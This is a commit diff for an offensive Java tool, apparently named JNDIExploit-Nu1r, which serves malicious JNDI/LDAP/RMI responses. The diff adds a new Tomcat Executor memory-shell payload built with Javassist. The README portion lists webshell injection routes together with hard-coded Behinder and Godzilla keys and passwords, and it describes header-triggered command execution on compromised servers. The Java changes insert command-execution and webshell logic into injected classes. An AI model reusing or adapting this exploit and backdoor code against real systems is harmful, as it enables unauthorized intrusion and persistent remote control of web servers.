提交项目

README.md

@@ -151,12 +151,12 @@ Supported LADP Queries：
   * ```TomcatEcho```: 用于在中间件为 ```Tomcat``` 时命令执行结果的回显，通过添加自定义```header``` ```cmd: whoami``` 的方式传递想要执行的命令
   * ```SpringEcho```: 用于在框架为 ```SpringMVC/SpringBoot``` 时命令执行结果的回显，通过添加自定义```header``` ```cmd: whoami``` 的方式传递想要执行的命令
   * ```WeblogicEcho```: 用于在中间件为 ```Weblogic``` 时命令执行结果的回显，通过添加自定义```header``` ```cmd: whoami``` 的方式传递想要执行的命令
-* 内存马已适配冰蝎4.0,AES加密, 添加后访问```/nu1r```即可, 暂时只写了冰蝎4的shell,冰蝎4.0使用时，需要先设置key为 ```f90ec6fa47af4bda```
+* 内存马已适配冰蝎4.0,AES加密, 添加后访问```/nu1r```即可, 暂时只写了冰蝎4的shell
+  - 前提条件：Referer: https://nu1r.cn/
+  - 冰蝎4.0使用时，需要先设置key为 ```f90ec6fa47af4bda```
   - 支持引用类远程加载方式打入（Basic路由）
   - 支持本地工厂类方式打入 （TomcatBypass路由）
     * ```SpringInterceptor```: 向系统内植入 Spring Interceptor 类型的内存马
-      * 前提条件：Referer: https://nu1r.cn/
-      * 冰蝎4.0使用时，需要先设置key为 ```f90ec6fa47af4bda```
       * X-nu1r-TOKEN 如果为 ce 则执行命令 , ?X-Token-Data=cmd
       * X-nu1r-TOKEN 如果为 bx 则为冰蝎马   密码 nu1ryyds
       * X-nu1r-TOKEN 如果为 gz 则为哥斯拉马 pass nu1r key nu1ryyds 
@@ -173,7 +173,8 @@ Supported LADP Queries：
     * ```TomcatListenerTh```: 通过线程类加载器获取指定上下文向系统内植入 Tomcat Listener 型内存马
     * ```TomcatServletJmx```: 利用 JMX MBeans 向系统内植入 Tomcat Servlet 型内存马
     * ```TomcatServletTh```: 通过线程类加载器获取指定上下文向系统内植入 Tomcat Servlet 型内存马
-    * ```WSFilter```: 通过线程类加载器获取指定上下文向系统内植入 WebSocket 内存马
+    * ```WSFilter```: `CMD` 命令回显 WebSocket 内存马
+    * ```TomcatExecutor``` :`CMD` 命令回显 Executor 内存马
 * 目前支持的所有 ```GadgetType``` 为
   * ```URLDNS```
   * ```CommonsBeanutils1```  

pom.xml

@@ -5,8 +5,8 @@
     <modelVersion>4.0.0</modelVersion>
 
     <groupId>org.example</groupId>
-    <artifactId>JNDI-NU</artifactId>
-    <version>1.5.2</version>
+    <artifactId>JNDI</artifactId>
+    <version>1.5.3-NU</version>
     <build>
         <plugins>
             <plugin>
@@ -87,6 +87,12 @@
     </properties>
 
     <dependencies>
+        <dependency>
+            <groupId>org.apache.tomcat</groupId>
+            <artifactId>tomcat-websocket</artifactId>
+            <version>9.0.62</version>
+            <scope>provided</scope>
+        </dependency>
         <dependency>
             <groupId>org.jboss.weld</groupId>
             <artifactId>weld-core</artifactId>

src/main/java/com/nu1r/jndi/HTTPServer.java

@@ -35,7 +35,7 @@ public void handle(HttpExchange httpExchange){
                 try {
                     System.out.println(ansi().eraseScreen().render(
                             "   @|green █████\\|@ @|red ██\\   ██\\|@ @|yellow ███████\\|@  @|MAGENTA ██████\\|@       @|CYAN ██\\   ██\\ ██\\   ██\\|@ \n" +
-                                    "   @|green \\__██ ||@@|red ███\\  ██ ||@@|yellow ██  __██\\|@ @|MAGENTA \\_██  _||@      @|CYAN ███\\  ██ |██ |  ██ ||@ @|BG_GREEN v1.5.2|@\n" +
+                                    "   @|green \\__██ ||@@|red ███\\  ██ ||@@|yellow ██  __██\\|@ @|MAGENTA \\_██  _||@      @|CYAN ███\\  ██ |██ |  ██ ||@ @|BG_GREEN v1.5.3|@\n" +
                                     "      @|green ██ ||@@|red ████\\ ██ ||@@|yellow ██ |  ██ ||@  @|MAGENTA ██ ||@        @|CYAN ████\\ ██ |██ |  ██ ||@ @|BG_CYAN JNDIExploit-Nu1r|@\n" +
                                     "      @|green ██ ||@@|red ██ ██\\██ ||@@|yellow ██ |  ██ ||@  @|MAGENTA ██ ||@██████\\ @|CYAN ██ ██\\██ |██ |  ██ ||@\n" +
                                     "@|green ██\\   ██ ||@@|red ██ \\████ ||@@|yellow ██ |  ██ ||@  @|MAGENTA ██ ||@\\______|@|CYAN ██ \\████ |██ |  ██ ||@\n" +

src/main/java/com/nu1r/jndi/LdapServer.java

@@ -42,7 +42,7 @@ public static void start() {
             ds.startListening();
             System.out.println(ansi().eraseScreen().render(
                     "   @|green █████\\|@ @|red ██\\   ██\\|@ @|yellow ███████\\|@  @|MAGENTA ██████\\|@       @|CYAN ██\\   ██\\ ██\\   ██\\|@ \n" +
-                            "   @|green \\__██ ||@@|red ███\\  ██ ||@@|yellow ██  __██\\|@ @|MAGENTA \\_██  _||@      @|CYAN ███\\  ██ |██ |  ██ ||@ @|BG_GREEN v1.5.2|@\n" +
+                            "   @|green \\__██ ||@@|red ███\\  ██ ||@@|yellow ██  __██\\|@ @|MAGENTA \\_██  _||@      @|CYAN ███\\  ██ |██ |  ██ ||@ @|BG_GREEN v1.5.3|@\n" +
                             "      @|green ██ ||@@|red ████\\ ██ ||@@|yellow ██ |  ██ ||@  @|MAGENTA ██ ||@        @|CYAN ████\\ ██ |██ |  ██ ||@ @|BG_CYAN JNDIExploit-Nu1r|@\n" +
                             "      @|green ██ ||@@|red ██ ██\\██ ||@@|yellow ██ |  ██ ||@  @|MAGENTA ██ ||@██████\\ @|CYAN ██ ██\\██ |██ |  ██ ||@\n" +
                             "@|green ██\\   ██ ||@@|red ██ \\████ ||@@|yellow ██ |  ██ ||@  @|MAGENTA ██ ||@\\______|@|CYAN ██ \\████ |██ |  ██ ||@\n" +
@@ -88,7 +88,7 @@ public void processSearchResult(InMemoryInterceptedSearchResult result) {
         //收到ldap请求
         System.out.println(ansi().eraseScreen().render(
                 "   @|green █████\\|@ @|red ██\\   ██\\|@ @|yellow ███████\\|@  @|MAGENTA ██████\\|@       @|CYAN ██\\   ██\\ ██\\   ██\\|@ \n" +
-                        "   @|green \\__██ ||@@|red ███\\  ██ ||@@|yellow ██  __██\\|@ @|MAGENTA \\_██  _||@      @|CYAN ███\\  ██ |██ |  ██ ||@ @|BG_GREEN v1.5.2|@\n" +
+                        "   @|green \\__██ ||@@|red ███\\  ██ ||@@|yellow ██  __██\\|@ @|MAGENTA \\_██  _||@      @|CYAN ███\\  ██ |██ |  ██ ||@ @|BG_GREEN v1.5.3|@\n" +
                         "      @|green ██ ||@@|red ████\\ ██ ||@@|yellow ██ |  ██ ||@  @|MAGENTA ██ ||@        @|CYAN ████\\ ██ |██ |  ██ ||@ @|BG_CYAN JNDIExploit-Nu1r|@\n" +
                         "      @|green ██ ||@@|red ██ ██\\██ ||@@|yellow ██ |  ██ ||@  @|MAGENTA ██ ||@██████\\ @|CYAN ██ ██\\██ |██ |  ██ ||@\n" +
                         "@|green ██\\   ██ ||@@|red ██ \\████ ||@@|yellow ██ |  ██ ||@  @|MAGENTA ██ ||@\\______|@|CYAN ██ \\████ |██ |  ██ ||@\n" +

src/main/java/com/nu1r/jndi/RMIServer.java

@@ -303,7 +303,7 @@ private boolean handleRMI(ObjectInputStream ois, DataOutputStream out) throws Ex
 
         System.out.println(ansi().eraseScreen().render(
                 "   @|green █████\\|@ @|red ██\\   ██\\|@ @|yellow ███████\\|@  @|MAGENTA ██████\\|@       @|CYAN ██\\   ██\\ ██\\   ██\\|@ \n" +
-                        "   @|green \\__██ ||@@|red ███\\  ██ ||@@|yellow ██  __██\\|@ @|MAGENTA \\_██  _||@      @|CYAN ███\\  ██ |██ |  ██ ||@ @|BG_GREEN v1.5.2|@\n" +
+                        "   @|green \\__██ ||@@|red ███\\  ██ ||@@|yellow ██  __██\\|@ @|MAGENTA \\_██  _||@      @|CYAN ███\\  ██ |██ |  ██ ||@ @|BG_GREEN v1.5.3|@\n" +
                         "      @|green ██ ||@@|red ████\\ ██ ||@@|yellow ██ |  ██ ||@  @|MAGENTA ██ ||@        @|CYAN ████\\ ██ |██ |  ██ ||@ @|BG_CYAN JNDIExploit-Nu1r|@\n" +
                         "      @|green ██ ||@@|red ██ ██\\██ ||@@|yellow ██ |  ██ ||@  @|MAGENTA ██ ||@██████\\ @|CYAN ██ ██\\██ |██ |  ██ ||@\n" +
                         "@|green ██\\   ██ ||@@|red ██ \\████ ||@@|yellow ██ |  ██ ||@  @|MAGENTA ██ ||@\\______|@|CYAN ██ \\████ |██ |  ██ ||@\n" +

src/main/java/com/nu1r/jndi/controllers/BasicController.java

@@ -178,6 +178,13 @@ public void sendResult(InMemoryInterceptedSearchResult result, String base) thro
                 insertKeyMethod(ctClass, "ws");
                 ctClass.setName(className);
                 break;
+            case tomcatexecutor:
+                className = "TWSMSFromThread";
+                pool      = ClassPool.getDefault();
+                ctClass   = pool.get("com.nu1r.jndi.template.tomcat.TWSMSFromThread");
+                insertKeyMethod(ctClass, "execute");
+                ctClass.setName(className);
+                break;
             case meterpreter:
                 className = Meterpreter.class.getName();
                 break;
@@ -248,6 +255,12 @@ public static void main(String[] args) throws Exception {
     }
 
     public static void insertKeyMethod(CtClass ctClass, String type) throws Exception {
+
+        // 判断是否为 Tomcat 类型，需要对 request 封装使用额外的 payload
+        String name = ctClass.getName();
+        name = name.substring(name.lastIndexOf(".") + 1);
+        boolean isTomcat = name.startsWith("T");
+
         // 判断是 filter 型还是 servlet 型内存马，根据不同类型写入不同逻辑
         String method = "";
 
@@ -275,16 +288,26 @@ public static void insertKeyMethod(CtClass ctClass, String type) throws Exceptio
                 ctClass.addMethod(CtMethod.make(Utils.base64Decode(BASE64_DECODE_STRING_TO_BYTE), ctClass));
                 ctClass.addMethod(CtMethod.make(Utils.base64Decode(GET_FIELD_VALUE), ctClass));
 
-                insertMethod(ctClass, method, Utils.base64Decode(BEHINDER_AES));
+                if (isTomcat) {
+                    insertMethod(ctClass, method, Utils.base64Decode(BEHINDER_SHELL_FOR_TOMCAT));
+                } else {
+                    insertMethod(ctClass, method, Utils.base64Decode(BEHINDER_SHELL));
+                }
                 break;
             case "ws":
-                ctClass.addMethod(CtMethod.make(Utils.base64Decode(TO_CSTRING_Method), ctClass));
-                ctClass.addMethod(CtMethod.make(Utils.base64Decode(GET_METHOD_BY_CLASS), ctClass));
-                ctClass.addMethod(CtMethod.make(Utils.base64Decode(GET_METHOD_AND_INVOKE), ctClass));
-                ctClass.addMethod(CtMethod.make(Utils.base64Decode(GET_FIELD_VALUE), ctClass));
+                insertCMD(ctClass);
 
                 insertMethod(ctClass, method, Utils.base64Decode(WS_SHELL));
                 break;
+            case "execute":
+                ctClass.addField(CtField.make("public static String TAG = \"su18\";", ctClass));
+                insertCMD(ctClass);
+                ctClass.addMethod(CtMethod.make(Utils.base64Decode(GET_REQUEST), ctClass));
+                ctClass.addMethod(CtMethod.make(Utils.base64Decode(BASE64_ENCODE_BYTE_TO_STRING), ctClass));
+                ctClass.addMethod(CtMethod.make(Utils.base64Decode(GET_RESPONSE), ctClass));
+
+                insertMethod(ctClass, method, Utils.base64Decode(EXECUTOR_SHELL));
+                break;
         }
     }
 
@@ -293,4 +316,23 @@ public static void insertMethod(CtClass ctClass, String method, String payload)
         CtMethod cm = ctClass.getDeclaredMethod(method);
         cm.setBody(payload);
     }
+
+    /**
+     * 向指定类中写入命令执行方法 execCmd
+     * 方法需要 toCString getMethodByClass getMethodAndInvoke getFieldValue 依赖方法
+     *
+     * @param ctClass 指定类
+     * @throws Exception 抛出异常
+     */
+    public static void insertCMD(CtClass ctClass) throws Exception {
+        ctClass.addMethod(CtMethod.make(Utils.base64Decode(TO_CSTRING_Method), ctClass));
+        ctClass.addMethod(CtMethod.make(Utils.base64Decode(GET_METHOD_BY_CLASS), ctClass));
+        ctClass.addMethod(CtMethod.make(Utils.base64Decode(GET_METHOD_AND_INVOKE), ctClass));
+        try {
+            ctClass.getDeclaredMethod("getFieldValue");
+        } catch (NotFoundException e) {
+            ctClass.addMethod(CtMethod.make(Utils.base64Decode(GET_FIELD_VALUE), ctClass));
+        }
+        ctClass.addMethod(CtMethod.make(Utils.base64Decode(EXEC_CMD), ctClass));
+    }
 }

src/main/java/com/nu1r/jndi/controllers/TomcatBypassController.java

@@ -115,6 +115,9 @@ public void sendResult(InMemoryInterceptedSearchResult result, String base) thro
             case jettyservlet:
                 code = helper.injectJettyServlet();
                 break;
+            case tomcatexecutor:
+                code = helper.injectTomcatExecutor();
+                break;
         }
 
         String finalPayload = payloadTemplate.replace("{replacement}", code);
@@ -333,6 +336,15 @@ public String injectWSFilter() throws Exception {
             return injectClass(ctClass.getClass());
         }
 
+        public String injectTomcatExecutor() throws Exception {
+            String    className = "TWSMSFromThread";
+            ClassPool pool      = ClassPool.getDefault();
+            CtClass   ctClass   = pool.get("com.nu1r.jndi.template.tomcat.TWSMSFromThread");
+            insertKeyMethod(ctClass, "execute");
+            ctClass.setName(className);
+            return injectClass(ctClass.getClass());
+        }
+
         public String injectSpringInterceptor() throws Exception {
             byte[]    classBytes;
             ClassPool pool                = ClassPool.getDefault();

src/main/java/com/nu1r/jndi/enumtypes/PayloadType.java

@@ -23,5 +23,6 @@ public enum PayloadType {
     jettyfilter,
     jettyservlet,
     wsfilter,
+    tomcatexecutor,
     meterpreter;
 }